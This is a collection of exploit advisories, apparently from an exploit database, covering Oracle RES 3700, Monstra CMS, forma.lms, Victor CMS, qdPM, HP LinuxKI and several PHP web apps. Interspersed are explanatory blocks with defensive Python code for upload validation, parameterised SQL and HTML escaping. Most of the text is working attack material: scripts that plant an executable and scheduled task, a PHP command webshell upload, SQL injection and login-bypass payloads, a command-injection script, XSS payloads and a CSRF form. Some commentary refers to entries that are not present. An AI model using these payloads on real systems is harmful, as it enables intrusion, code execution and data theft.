print '-------------------------------------------------'
print

IP = raw_input("Enter the IP address: ")
URL = "http://" + IP + ":50123"

f = open("attacker-4.9.exe",'rb')
raw_payload = f.read()
payload_hex = binascii.hexlify(raw_payload)
f.close()

g = open("attacker-4.9.job",'rb')
raw_task = g.read()
scheduled_task_hex = binascii.hexlify(raw_task)
g.close()

def exploit_body(data,full_path):
    body = '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> \
    <SOAP-ENV:Body xmlns:MCRS-ENV="MCRS-URI"> \
    <MCRS-ENV:Service>MDSSYSUTILS</MCRS-ENV:Service> \
    <MCRS-ENV:Method>TransferFile</MCRS-ENV:Method> \
    <MCRS-ENV:SessionKey>Session</MCRS-ENV:SessionKey> \
    <MCRS-ENV:InputParameters> \
    <dst>' + full_path + '</dst> \
    <fn>' + full_path + '</fn> \
    <data>' + data + '</data> \
    </MCRS-ENV:InputParameters> \
    </SOAP-ENV:Body> \
    </SOAP-ENV:Envelope>'
    return body

def exploit_headers(body):
    headers = {
        "Content-Type" : "text/xml",
        "User-Agent" : "MDS POS Client",
        "Host" : IP + ":50123",
        "Content-Length" : str(len(body)),
        "Connection" : "Keep-Alive"
    }
    return headers

print 'Exploiting Oracle Hospitality RES 3700 at IP address ' + IP + '...'

body_payload = exploit_body(payload_hex,"C:\\Windows\\System32\\attacker-4.9.exe")
body_task = exploit_body(scheduled_task_hex,"C:\\Windows\\Tasks\\attacker-4.9.job")

send_payload = requests.post(URL,data=body_payload,headers=exploit_headers(body_payload))
send_task = requests.post(URL,data=body_task,headers=exploit_headers(body_task))
-
Monstra CMS 3.0.4 - Authenticated Arbitrary File Upload
# Exploit Title: Monstra CMS 3.0.4 - Authenticated Arbitrary File Upload
# Google Dork: N/A
# Date: 2020-05-18
# Exploit Author: Kishan Lal Choudhary
# Vendor Homepage: https://monstra.org
# Software Link: https://bitbucket.org/awilum/monstra/downloads/monstra-3.0.4.zip
# Version: 3.0.4
# Tested on: Ubuntu

1. Go to: http://192.168.2.5/monstra/admin/index.php?id=filesmanager&path=uploads/
2. Upload a one-liner shell with the php7 extension, i.e. shell.php7 (the upload filter blocks .php but not this alternative extension, which the web server still hands to the PHP interpreter).

#burp request
------------------------------------EOF-----------------------------------------------------
POST /monstra/admin/index.php?id=filesmanager HTTP/1.1
Host: 192.168.2.5
Content-Length: 548
Cache-Control: max-age=0
Origin: http://192.168.2.5
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytRfyCkYq8NvztDBf
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.2.5/monstra/admin/index.php?id=filesmanager
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fr;q=0.7
Cookie: PHPSESSID=eej6e0lqi191k2frqc2hl3v6d0; _ga=GA1.1.405623579.1579949328; _gid=GA1.1.2042923722.1579949328
Connection: close

------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="csrf"

2e6ae2353998caa319aae262b113c6b3f17a9636
------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="file"; filename="shell.php7"
Content-Type: application/octet-stream

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="upload_file"

Upload
------WebKitFormBoundarytRfyCkYq8NvztDBf--
------------------------------------EOF-----------------------------------------------------

3. Trigger your shell by visiting http://192.168.2.5/monstra/public/uploads/shell.php7?cmd=id

We have successfully obtained remote code execution.
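The Monstra bypass works because the upload check is a deny-list keyed on one extension while the web server maps several extensions (php7, phtml, php5 and so on, depending on the handler configuration) to PHP. The block below is an added example, not Monstra code, contrasting that style of check with an allow-list that validates every suffix in the name and never stores the file under the client-supplied name. The ALLOWED set and the test filenames are constructed for the demo.

```python
import os
import re
import secrets

# Extensions the web server must never execute; a deny-list like this is
# what a filename such as shell.php7 or shell.phtml walks straight past.
BLACKLIST = {"php"}

# Allow-list approach: only these, and every extension in the name must match.
ALLOWED = {"png", "jpg", "jpeg", "gif", "pdf", "txt"}
EXT_RE = re.compile(r"[a-z0-9]+")


def blacklist_allows(filename):
    """Checks only the last extension against a short deny-list."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in BLACKLIST


def allowlist_allows(filename):
    """Path stripped, hidden files refused, all suffixes must be allowed
    (Apache mod_mime honours every extension, so shell.php.png matters)."""
    base = os.path.basename(filename)
    if base in ("", ".", "..") or base.startswith("."):
        return False
    parts = base.lower().split(".")
    if len(parts) < 2:
        return False
    return all(EXT_RE.fullmatch(p) is not None and p in ALLOWED for p in parts[1:])


def stored_name(filename):
    """Never keep the client's name: store under a random name with the
    validated final extension, in a directory served without a script handler."""
    if not allowlist_allows(filename):
        raise ValueError("extension not allowed: " + filename)
    ext = os.path.basename(filename).lower().rsplit(".", 1)[-1]
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    for name in ("shell.php7", "shell.phtml", "shell.php.png", "photo.JPG"):
        print("%-16s deny-list: %-5s allow-list: %s" % (
            name, blacklist_allows(name), allowlist_allows(name)))
```

Extension checks are only one layer: the upload directory also needs `php_flag engine off` (Apache) or an equivalent `location` block without a PHP handler (nginx), and the Content-Type header the client sends should be ignored, since the request above sets it to application/octet-stream freely.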
-
forma.lms The E-Learning Suite 2.3.0.2 - Persistent Cross-Site Scripting
# Exploit Title: forma.lms The E-Learning Suite 2.3.0.2 - Persistent Cross-Site Scripting
# Date: 2020-05-15
# Exploit Author: Daniel Ortiz
# Vendor Homepage: https://sourceforge.net/projects/forma/
# Software link: https://sourceforge.net/projects/forma/files/latest/download
# Tested on: XAMPP for Linux 64bit 5.6.40-0

## 1 - Course Module
- Vulnerable parameters: course_code, course_name, course_box_descr, course_descr
- Payload: <SCRIPT>alert('XSS');</SCRIPT>
- Details: There is no control or security mechanism on these fields. Special characters are not encoded or filtered.
- Privileges: Requires admin.
- Location: Admin Area > E-learning > Courses > Courses > Edit Course
- Endpoint: /formalms/appCore/index.php?r=alms/course/modcourse

## 2 - Profile Module
- Vulnerable parameter: Email
- Payload: <div>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onmouseover=alert('xss') )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</div>
- Details: There is some control on this field (the simple <script> form is rejected), but the polyglot above bypasses it.
- Privileges: Does not require an admin account; a regular (student) account suffices.
- Location: My Profile > Edit > Put the payload in the Email field.
- Endpoint: /formalms/appLms/index.php?r=lms/profile/show&ap=saveinfo
-
online Chatting System 1.0 - 'id' SQL Injection
# Exploit Title: online Chatting System 1.0 - 'id' SQL Injection
# Google Dork: N/A
# Date: 2020-05-17
# Exploit Author: BKpatron
# Vendor Homepage: https://www.sourcecodester.com/php/14224/online-chatting-system-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/onlinechatting.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
# my website: bkpatron.com

# Description: The online Chatting System v1.0 application is vulnerable to SQL injection via the 'id' parameter on the chatroom.php page.
# vulnerable file: chatroom.php

http://localhost/chat_system/user/chatroom.php?id=5

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=5' AND 2674=2674 AND 'NdtA'='NdtA

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=5' AND (SELECT 8144 FROM(SELECT COUNT(*),CONCAT(0x7171717a71,(SELECT (ELT(8144=8144,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OIwS'='OIwS

    Type: time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: id=5' AND 4648=BENCHMARK(5000000,MD5(0x67644874)) AND 'oSJd'='oSJd
---
[INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.39, PHP 7.2.18
back-end DBMS: MySQL >= 5.0

# Proof of Concept:
http://localhost/chat_system/user/chatroom.php?id=5

GET /chat_system/user/chatroom.php?id=5%27%20AND%20(SELECT%208144%20FROM(SELECT%20COUNT(*),CONCAT(0x7171717a71,(SELECT%20(ELT(8144=8144,1))),0x71766b7a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27OIwS%27=%27OIwS HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mstb1630gvh0f97me7qdh5f7ke
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
-
Online Healthcare management system 1.0 - Authentication Bypass
# Exploit Title: Online Healthcare management system 1.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-05-16
# Exploit Author: BKpatron
# Vendor Homepage: https://www.sourcecodester.com/php/14217/online-healthcare-patient-record-management-system-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/onlinehealthcare.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
# my website: bkpatron.com

# Vulnerability: An attacker can bypass the login page and access the dashboard page.
# vulnerable file: admin/index.php || admin/login.php
# Parameter & Payload: '=''or'   (sent as both username and password; MySQL evaluates username=''='' as true, so the OR makes the WHERE clause match every row)

# Proof of Concept:
http://localhost/onlinehealthcare/admin/login.php

POST /onlinehealthcare/admin/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------293261110021842
Content-Length: 356
Referer: http://localhost/onlinehealthcare/admin/index.php
Cookie: _ga=GA1.1.1353584531.1478253768
Connection: keep-alive
Upgrade-Insecure-Requests: 1

-----------------------------293261110021842
Content-Disposition: form-data; name="username"

'=''or'
-----------------------------293261110021842
Content-Disposition: form-data; name="password"

'=''or'
-----------------------------293261110021842
Content-Disposition: form-data; name="login"


-----------------------------293261110021842--
-
Online Healthcare Patient Record Management System 1.0 - Authentication Bypass
# Exploit Title: Online Healthcare Patient Record Management System 1.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-05-18
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14217/online-healthcare-patient-record-management-system-using-phpmysql.html
# Version: N/A
# Tested on: Kali Linux 2020.2 x64
# CVE : N/A

The Online Healthcare Patient Record Management System suffers from multiple authentication bypass vulnerabilities.

The login.php file allows a user to supply ' or 1=1 -- as the username and any password and bypass the authentication:

<?php
session_start();
if(ISSET($_POST['login'])){
    $username = $_POST['username'];
    $password = $_POST['password'];
    $conn = new mysqli("localhost", "root", "", "hcpms") or die(mysqli_error());
    $query = $conn->query("SELECT * FROM `user` WHERE `username` = '$username' && `password` = '$password'") or die(mysqli_error());

The same happens with login.php for the admin area:

<?php
session_start();
$username = $_POST['username'];
$password = $_POST['password'];
if(ISSET($_POST['login'])){
    $conn = new mysqli("localhost", "root", "", "hcpms") or die(mysqli_error());
    $query = $conn->query("SELECT *FROM `admin` WHERE `username` = '$username' && `password` = '$password'") or die(mysqli_error());
    $fetch = $query->fetch_array();
    $valid = $query->num_rows;
    if($valid > 0){
        $_SESSION['admin_id'] = $fetch['admin_id'];
        header("location:home.php");

There is also an authentication bypass issue located in add_user.php:

<?php
if(ISSET($_POST['save_user'])){
    $username = $_POST['username'];
    $password = $_POST['password'];
    $firstname = $_POST['firstname'];
    $middlename = $_POST['middlename'];
    $lastname = $_POST['lastname'];
    $section = $_POST['section'];
    $conn = new mysqli("localhost", "root", "", "hcpms");
    $q1 = $conn->query("SELECT * FROM `user` WHERE `username` = '$username'") or die(mysqli_error());
    $f1 = $q1->fetch_array();
    $c1 = $q1->num_rows;
    if($c1 > 0){
        echo "<script>alert('Username already taken')</script>";
    }else{
        $conn->query("INSERT INTO `user` VALUES('', '$username', '$password', '$firstname', '$middlename', '$lastname', '$section')");
        header("location: user.php");
    }
}

If a request is made with the required parameters, anyone can create a user account (no authentication is required to do this; the file never checks the session).

Finally, there are many SQL injection vulnerabilities (GET parameters passed directly to SQL queries), but those are authenticated.
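The two healthcare advisories above show the same login query with two payloads: ' or 1=1 -- turns the WHERE clause into a tautology, and '=''or' relies on MySQL comparing the false result of `username = ''` (0) with '' (coerced to 0). The block below is an added example, not code from either advisory or the application: it rebuilds the admin login against a constructed SQLite table, reproduces the tautology bypass, and then shows the fix, a bound parameter plus a salted PBKDF2 hash compared in application code, together with the session check add_user.php lacks. The '=''or' variant is not reproduced because SQLite does not apply MySQL's string-to-number coercion, so it fails there.

```python
import hashlib
import hmac
import secrets
import sqlite3

ITERATIONS = 50_000  # PBKDF2 work factor for the demo


def make_vulnerable_db():
    """Constructed admin table storing a plaintext password, as the page's
    application does."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (admin_id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES (1, 'admin', 'admin123')")
    return conn


def login_vulnerable(conn, username, password):
    """Same shape as the page's query (SQLite's AND stands in for MySQL's &&).
    Returns the admin_id the app would drop into $_SESSION."""
    sql = ("SELECT admin_id FROM admin WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def hash_password(password):
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt.hex() + "$" + digest.hex()


def verify_password(stored, candidate):
    salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", candidate.encode(),
                                 bytes.fromhex(salt_hex), ITERATIONS)
    return hmac.compare_digest(digest.hex(), digest_hex)


def make_fixed_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (admin_id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES (?, ?, ?)",
                 (1, "admin", hash_password("admin123")))
    return conn


def login_fixed(conn, username, password):
    """Bound parameter, then a constant-time hash comparison in application
    code: the password never takes part in the SQL at all."""
    row = conn.execute("SELECT admin_id, password FROM admin WHERE username = ?",
                       (username,)).fetchone()
    if row is None or not verify_password(row[1], password):
        return None
    return row[0]


def add_user_fixed(conn, session, username, password):
    """The check add_user.php is missing: refuse unless the caller's session
    was set by a successful admin login."""
    if not session.get("admin_id"):
        return False
    conn.execute("INSERT INTO admin VALUES (?, ?, ?)",
                 (None, username, hash_password(password)))
    return True


if __name__ == "__main__":
    print("vulnerable login with tautology:",
          login_vulnerable(make_vulnerable_db(), "' or 1=1 -- ", "anything"))
    db = make_fixed_db()
    print("fixed login with tautology:", login_fixed(db, "' or 1=1 -- ", "anything"))
    print("fixed login with real credentials:", login_fixed(db, "admin", "admin123"))
```

Binding the parameter is what stops the bypass; the hash is there because the page's schema keeps passwords in clear, and a SQL injection elsewhere in the same application (the advisory notes several authenticated ones) would otherwise dump them directly.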
-
HP LinuxKI 6.01 - Remote Command Injection
Exploit Title: HP LinuxKI 6.01 - Remote Command Injection
Date: 2020-05-17
Exploit Author: Cody Winkler
Vendor Homepage: https://www.hpe.com/us/en/home.html
Software Link: https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-1
Version: <= v6.0-1
Tested on: LinuxKI Docker Image
CVE: CVE-2020-7209

The 'pid' parameter of /linuxki/experimental/vis/kivis.php is placed into a shell command without validation; a ';' ends the intended command and everything after it runs as the web server user. The exploit wraps the injected command in echo markers so its output can be cut out of the HTML response.

#!/usr/bin/env python3

import requests
import argparse
import sys
import re

def parse_options():
    formatter = lambda prog: argparse.HelpFormatter(prog,max_help_position=50)
    parser = argparse.ArgumentParser(description='HP LinuxKI <= 6.0-1 RCE - CVE-2020-7209', formatter_class=formatter)
    parser.add_argument("-i", "--ip", dest='host', type=str, help="Target Hostname/IP", required=True)
    parser.add_argument("-p", "--port", dest='port', type=str, help="Target Port", required=True)
    parser.add_argument("-c", "--cmd", dest='cmd', type=str, help="Command to execute", required=True)
    args = parser.parse_args()
    return args

def main(args):
    host = args.host
    port = args.port
    cmd = args.cmd
    # pid=15 is a dummy value; everything after the ';' is the injected command
    path = '/linuxki/experimental/vis/kivis.php?type=kitrace&pid=15;echo BEGIN;%s;echo END;' % cmd
    rce = requests.get('http://' + host + ':' + port + path, verify=False)
    output = rce.text
    # cut the command output out from between the BEGIN/END markers
    a, b = output.find('BEGIN'), output.find('END')
    print(output[a+6:b])

if __name__ == "__main__":
    args = parse_options()
    main(args)
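The LinuxKI issue is a textbook shell-string injection. The block below is an added example, not LinuxKI code or the exploit author's: the exact command kivis.php runs is not on the page, so `echo` stands in for the tracing tool, and the three functions contrast the vulnerable string build, a shlex.quote mitigation, and the correct fix (validate the pid as an integer, then pass it as one argv element with no shell). The BEGIN/END extraction helper mirrors the exploit's trick for reading results back.

```python
import re
import shlex
import subprocess

# 'echo' stands in for the tracing tool kivis.php invokes; the real command
# string is not on the page, only that the pid is spliced into it.
TOOL = "echo tracing pid"


def build_vulnerable(pid):
    """String for /bin/sh -c: ';' in pid ends the command and starts another."""
    return TOOL + " " + pid


def run_vulnerable(pid):
    return subprocess.run(build_vulnerable(pid), shell=True,
                          capture_output=True, text=True).stdout


def build_quoted(pid):
    """shlex.quote makes the value a single shell word. Better than nothing,
    but it still relies on a shell; the functions below avoid one."""
    return TOOL + " " + shlex.quote(pid)


PID_RE = re.compile(r"[0-9]{1,7}")


def validate_pid(value):
    """Positive integer or nothing: reject before any command is built."""
    if not PID_RE.fullmatch(value) or int(value) == 0:
        raise ValueError("pid must be a positive integer")
    return int(value)


def run_fixed(pid):
    """Validated value passed as an argv element with no shell: nothing in it
    can be interpreted as syntax."""
    n = validate_pid(pid)
    return subprocess.run(["echo", "tracing", "pid", str(n)],
                          capture_output=True, text=True).stdout


def rejects(value):
    try:
        validate_pid(value)
        return False
    except ValueError:
        return True


def between(output, start="BEGIN", end="END"):
    """Same trick as the exploit: pull out just the injected command's output."""
    a, b = output.find(start), output.find(end)
    if a < 0 or b < 0:
        return None
    return output[a + len(start):b].strip()


if __name__ == "__main__":
    injected = "15;echo BEGIN;id;echo END"
    print("vulnerable:", between(run_vulnerable(injected)))
    print("quoted string:", build_quoted(injected))
    print("fixed:", run_fixed("15").strip(), "| rejects injected:", rejects(injected))
```

Validation and argv passing are both needed: quoting alone keeps the value in one word but still lets a program that itself invokes a shell (or interprets leading dashes as options) misbehave, and an allow-list of digits leaves nothing for either to act on.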
-
Victor CMS 1.0 - 'cat_id' SQL Injection
# Exploit Title: Victor CMS 1.0 - 'cat_id' SQL Injection
# Google Dork: N/A
# Date: 2020-05-19
# Exploit Author: Kishan Lal Choudhary
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: 1.0
# Tested on: Windows 10

Description: The GET parameter 'cat_id' of category.php is vulnerable to SQL Injection (numeric context, so no quote is needed; the original SELECT has 10 columns, which the UNION must match).

Payload: UNION+SELECT+1,2,VERSION(),DATABASE(),5,6,7,8,9,10+--

http://localhost/category.php?cat_id=-1+UNION+SELECT+1,2,VERSION(),DATABASE(),5,6,7,8,9,10+--

By exploiting the SQL Injection vulnerability with the payload above, an attacker is able to retrieve the database name and the version of MySQL running on the server.
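The Online Examination System entry (sqlmap: "Generic UNION query (NULL) - 5 columns") and the Victor CMS entry just above both use UNION-based injection, where the attacker first has to find the column count of the original SELECT and then place an expression in a column the page renders. The block below is an added example and not code from those advisories or projects; it works against a constructed SQLite schema of five columns, finds the count by growing a list of NULLs until the UNION parses, reads sqlite_version() and another table's value back through the rendered column, and shows the integer validation plus bound parameter that fix a numeric parameter.

```python
import sqlite3


def make_db():
    """Constructed schema: posts listed by category, plus a users table with
    something worth stealing. Names are invented for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER, cat_id INTEGER, title TEXT, "
                 "body TEXT, author TEXT, created TEXT)")
    conn.execute("INSERT INTO posts VALUES (1, 1, 'Hello', 'First post', "
                 "'admin', '2020-05-19')")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'hunter2')")
    return conn


def category_vulnerable(conn, cat_id):
    """Numeric context without quotes, like  category.php?cat_id=-1 UNION ..."""
    sql = ("SELECT id, title, body, author, created FROM posts "
           "WHERE cat_id = " + cat_id)
    return conn.execute(sql).fetchall()


def category_fixed(conn, cat_id):
    """Reject anything that is not an integer before it reaches SQL, and bind
    the value; for a numeric parameter both steps are needed."""
    if not cat_id.lstrip("-").isdigit():
        raise ValueError("cat_id must be an integer")
    sql = ("SELECT id, title, body, author, created FROM posts "
           "WHERE cat_id = ?")
    return conn.execute(sql, (int(cat_id),)).fetchall()


def find_column_count(conn, max_cols=20):
    """Step 1 of a UNION attack: a UNION only parses when both SELECTs have the
    same number of columns, so grow a list of NULLs until the error stops."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        try:
            category_vulnerable(conn, "-1 UNION SELECT " + nulls)
            return n
        except sqlite3.OperationalError:
            continue
    return None


def union_extract(conn, expression, ncols, position=1):
    """Step 2: put the expression in a column the page renders (here 'title',
    position 1) and read it back. -1 matches no real row, so only the UNION
    row comes back."""
    cols = ["NULL"] * ncols
    cols[position] = expression
    rows = category_vulnerable(conn, "-1 UNION SELECT " + ",".join(cols))
    return rows[0][position]


def fixed_rejects(conn, value):
    try:
        category_fixed(conn, value)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    db = make_db()
    n = find_column_count(db)
    print("column count:", n)
    print("db version via UNION:", union_extract(db, "sqlite_version()", n))
    print("admin password via UNION:",
          union_extract(db, "(SELECT password FROM users WHERE username='admin')", n))
    print("fixed query rejects the payload:", fixed_rejects(db, "-1 UNION SELECT NULL"))
```

NULL is used as the filler because it is type-compatible with every column; on MySQL, where the page's payloads use 1,2,...,10, a numeric filler in a string column works as well, but strict type checking in other engines makes NULL the safer choice.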
-
Victor CMS 1.0 - 'comment_author' Persistent Cross-Site Scripting
# Exploit Title: Victor CMS 1.0 - 'comment_author' Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2020-05-19
# Exploit Author: Kishan Lal Choudhary
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: 1.0
# Tested on: Windows 10

Description: The POST parameter 'comment_author' is vulnerable to stored cross-site scripting. No authentication is needed to post a comment, and the form carries no anti-CSRF token, so the same payload can also be planted through a victim's browser (see the CSRF PoC below).

Payload: <script>alert(1)</script>

POST /post.php?post=1 HTTP/1.1
Host: localhost
Content-Length: 146
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/post.php?post=1
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fr;q=0.7
Cookie: PHPSESSID=cjpan858fghefnjse7qv1j3v72
Connection: close

comment_author=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&comment_email=lol%40lol.com&comment_content=%3Cp%3Etester%3C%2Fp%3E&create_comment=

------------------------------------------------------------------------------------------------------------------------------------------------------------------
CSRF

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://149.28.135.91/post.php?post=1" method="POST">
      <input type="hidden" name="comment_author" value="<script>alert("XSS")</script>" />
      <input type="hidden" name="comment_email" value="lol@lol.com" />
      <input type="hidden" name="comment_content" value="<p>tester</p>" />
      <input type="hidden" name="create_comment" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
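Three stored-XSS entries on this page (ManageEngine's agent-reported program name, the forma.lms e-mail polyglot, and the Victor CMS comment author) differ only in how the value reaches the page; the sink is the same, a string dropped into HTML text unencoded. The block below is an added example, not code from any of those advisories or products: it renders each of the page's three payloads through a deny-list "sanitiser" of the kind that stops only the plain <script> case, and through contextual HTML escaping, and checks whether a raw '<' survives into the output. The payloads are embedded as constructed test input (the ManageEngine one keeps its <attacker_ip> placeholder); render_software_table() is a stand-in for the asset page, not ManageEngine's code.

```python
import html
import re

# The three stored values from the page, embedded here as constructed test
# input (the ManageEngine one keeps its <attacker_ip> placeholder).
MANAGEENGINE_DISPLAYNAME = (
    'test</a><script src=http://<attacker_ip>/addadmin.js '
    'type="text/javascript"/><a>bla')
FORMALMS_POLYGLOT = r"""<div>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onmouseover=alert('xss') )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</div>"""
VICTOR_COMMENT = '<script>alert("XSS")</script>'

SCRIPT_TAG = re.compile(r"<\s*/?\s*script[^>]*>", re.IGNORECASE)


def render_naive(value):
    """Deny-list 'sanitiser': drops <script> tags and trusts the rest."""
    return "<td>" + SCRIPT_TAG.sub("", value) + "</td>"


def render_escaped(value):
    """Contextual output encoding for HTML text: every < > & " ' becomes an
    entity, so no tag or attribute can start, whatever the input was."""
    return "<td>" + html.escape(value, quote=True) + "</td>"


def can_open_tag(rendered):
    """Crude check used below: a raw '<' in the cell body is what lets the
    browser create an element."""
    body = rendered[len("<td>"):-len("</td>")]
    return "<" in body


def render_software_table(rows, renderer=render_escaped):
    """Stand-in for an asset page: one cell per installed-program name as
    read back from an agent (the registry DisplayName in the ManageEngine
    case). Data that never passed through a web form still gets encoded."""
    return "<table>" + "".join(
        "<tr>" + renderer(name) + "</tr>" for name in rows) + "</table>"


if __name__ == "__main__":
    for label, payload in (("ManageEngine", MANAGEENGINE_DISPLAYNAME),
                           ("forma.lms", FORMALMS_POLYGLOT),
                           ("Victor CMS", VICTOR_COMMENT)):
        print("%-12s deny-list leaves a tag open: %-5s escaped: %s" % (
            label, can_open_tag(render_naive(payload)),
            can_open_tag(render_escaped(payload))))
```

The deny-list stops the Victor CMS comment and nothing else: the ManageEngine value still injects an <a> element (and, with a different regex, the script tag itself), and the forma.lms polyglot does not use a <script> tag at all. html.escape() is correct for text and for quoted attribute values; JavaScript, URL and CSS contexts each need their own encoder, which is the point of a templating engine that escapes by default.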
-
qdPM 9.1 - 'cfg[app_app_name]' Persistent Cross-Site Scripting
# Exploit Title: qdPM 9.1 - 'cfg[app_app_name]' Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2020-05-19
# Exploit Author: Kishan Lal Choudhary
# Vendor Homepage: https://qdpm.net
# Software Link: https://sourceforge.net/projects/qdpm/
# Version: 9.1
# Tested on: Windows 10

Description: The form parameter 'cfg[app_app_name]' is vulnerable to stored cross-site scripting

Payload: <script>alert(1)</script>

POST /index.php/configuration HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------224716807133186052992861925563
Content-Length: 1881
Origin: http://localhost/
DNT: 1
Connection: close
Referer: http://localhost/index.php/configuration?type=general
Cookie: qdPM8=c14e5521818ec7a0c8bbc3099a96b94a
Upgrade-Insecure-Requests: 1

-----------------------------224716807133186052992861925563
Content-Disposition: form-data; name="type"

general
-----------------------------224716807133186052992861925563
Content-Disposition: form-data; name="cfg[app_administrator_email]"

[email protected]
-----------------------------224716807133186052992861925563
Content-Disposition: form-data; name="cfg[app_administrator_password]"


-----------------------------224716807133186052992861925563
Content-Disposition: form-data; name="cfg[app_app_name]"

<script>alert(1)</script>
-----------------------------224716807133186052992861925563
Content-Disposition: form-data; name="cfg[app_app_short_name]"

qdPM
-----------------------------224716807133186052992861925563
Content-Disposition: form-data; name="cfg_app_app_logo_file"; filename=""
Content-Type: application/octet-stream


-----------------------------224716807133186052992861925563
Content-Disposition: form-data; name="cfg[app_app_logo]"


-----------------------------224716807133186052992861925563
Content-Disposition: form-data; name="cfg[sf_default_timezone]"

America/New_York
-----------------------------224716807133186052992861925563
Content-Disposition: form-data; name="cfg[sf_default_culture]"

ar
-----------------------------224716807133186052992861925563
Content-Disposition: form-data; name="cfg[app_rows_per_page]"

25
-----------------------------224716807133186052992861925563
Content-Disposition: form-data; name="cfg[app_rows_limit]"

1000
-----------------------------224716807133186052992861925563
